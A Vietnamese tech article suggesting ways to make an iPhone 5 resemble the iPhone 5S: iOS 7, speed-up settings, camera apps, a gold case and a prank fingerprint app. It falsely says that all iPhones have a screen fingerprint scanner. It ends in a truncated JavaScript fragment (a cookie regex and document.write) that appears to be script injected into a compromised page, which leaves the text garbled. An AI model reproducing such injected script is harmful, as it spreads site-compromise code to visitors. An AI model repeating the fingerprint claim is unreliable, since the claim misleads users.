Biến iPhone 5 thành iPhone 5S

Nếu bạn không thể đợi được đến tận 20/9 hoặc túi tiền của bạn còn khá eo hẹp cho việc nâng cấp lên iPhone 5S thì bạn có thể làm theo cách sau đây đẻ biến chiếc iPhone 5 thành iPhone 5S.

Chúng ta có thể tạo ra được một chiếc iPhone 5S từ iPhone 5

Ngay cả những người thất vọng nhất về chiếc iPhone thế hệ thứ 7 này của Apple cũng vẫn có một chút rung động với sự kiện chiếc iPhone mới nhất của Quả Táo Khuyết ra mắt. Sự khôn khéo của Apple là đã khoác lên cho iPhone 5S một chiếc áo mới trên một thiết kế về cơ bản vẫn là iPhone 5 được ra mắt từ năm ngoái.

1. Nâng cấp lên iOS 7

5S đã được cài đặt sẵn iOS 7, nhưng từ ngày 18/9 tới đây, người dùng cũng có thể cài đặt hệ điều hành này cho iPhone 5. Và như vậy, giao diện của người tiền nhiệm này không khác so với người anh em của nó là mấy.

Giao diện iOS 7 trên iPhone 5

2. Tăng tốc

Trên thực tế, tốc độ của iPhone 5 không hề chậm, chip A6 vẫn đủ sức để đảm nhận tất cả những nhiệm vụ của nó. Một năm trước, Apple đã giới thiệu về sức mạnh của thế hệ chip A6, chẳng lẽ sự xuất hiện của A6 lại khiến nó chạy chậm hơn chăng?

Sau đây có một vài cách để tăng tốc độ của iPhone 5 mà tác giả Donald Bell của CNET đã từng gợi ý:

– Vào Settings > General > Usage và loại bỏ những ứng dụng không cần thiết.

– vào Settings > Safari và sau đó click vào 2 nút xóa lịch sử, dữ liệu rồi reset lại máy. Đây là cách để bạn làm sạch trình duyệt của mình.

– Khởi động lại hệ thống: vào Settings > General > Reset và chọn Reset All Settings và sau đó bạn sẽ không chọn Erase All Content and Settings. Bạn sẽ nhận được 2 ảnh báo và sau đó máy tự khởi động lại.

– Làm sạch nút Home.

3. Nâng cấp hình ảnh

iPhone mới được nâng cấp về camera, với một cảm biến lớn hơn hứa hẹn sẽ chụp lại được những bức ảnh thiếu sáng tốt hơn và 1 đèn Flash 2 tông màu sẽ cải thiện được độ chính xác của màu sắc.

Người dùng sẽ không thể cải thiện được phần quang học của thiết bị, nhưng bạn có thể sử dụng các ứng dụng để đạt được kết quả tương tự. Với ứng dụng Cortex Camera, chiếc điện thoại của bạn sẽ chụp được ảnh trong điều kiện thiếu sáng mà không hề bị nhiễu.

Ứng dụng Cortex Camera giúp iPhone 5 chụp ảnh trong điều kiện thiếu sáng

Còn với ứng dụng SloPro bạn hoàn toàn có thể tùy chỉnh các chế độ chụp, quay chậm.

Những tính năng này được hỗ trợ bởi phần mềm và dường như Apple chỉ việc tích hợp chúng trên iOS 7 mà thôi.

4. Vỏ màu vàng

iPhone mới có thêm màu vàng đặc biệt, nếu bạn yêu thích màu này bạn hoàn toàn có thể làm điều đó với iPhone 5 của mình tại các cửa hàng độ iPhone bằng kim loại hoặc sợi cacbon, hay thậm chí là một lớp mạ vàng.

5. Giả máy quét vân tay

Công nghệ bảo mật vân tay thực sự rất mới mẻ, nhưng bạn cũng đã biết rằng, tất cả các iPhone đều có quét vân tay được tích hợp trên màn hình? Bạn có thể mở chế độ đặc biệt này bằng cách cài đặt ứng dụng Mood Finger Scan (đây là một ứng dụng nhận biết tâm trạng hiện tại của chủ nhân điện thoại vào vào quá trình quét vân tay và phân tích dấu vân tay) để làm máy giả quét vân tay.

Ứng dụng Mood Finger Scan  có thể giả máy quét vân tay

Hy vọng với những gợi ý nâng cấp này có thể khiến bạn hài lòng. Dù sao đi nữa, với iPhone 5 bạn cũng không cảm thấy rằng nó kém cạnh so với iPhone 5S là bao nhiêu. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘